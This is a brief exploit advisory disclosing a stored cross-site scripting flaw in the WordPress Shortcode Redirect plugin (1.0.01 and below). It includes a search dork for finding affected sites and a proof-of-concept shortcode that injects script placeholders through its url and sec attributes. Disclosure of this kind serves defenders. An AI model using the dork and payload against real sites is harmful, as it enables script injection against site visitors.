WordPress Shortcode Redirect plugin versions 1.0.01 and below suffer from a stored cross site scripting vulnerability.
11ec55d0ba7a200916917b207a8c5e1e61dff79ac510ee32877945901af7b016
# Exploit Title: Wordpress Shortcode Redirect plugin <= 1.0.01 Stored XSS
# Dork: inurl:/wp-content/plugins/shortcode-redirect/
# Date: 2012/01/18
# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugin/shortcode-redirect.1.0.01.zip
# Version: 1.0.01
1) You need permissions to write a post (HTML mode) to exploit the shortcode:
[redirect url='http://wherever.com"[XSS]' sec='500"[XSS]']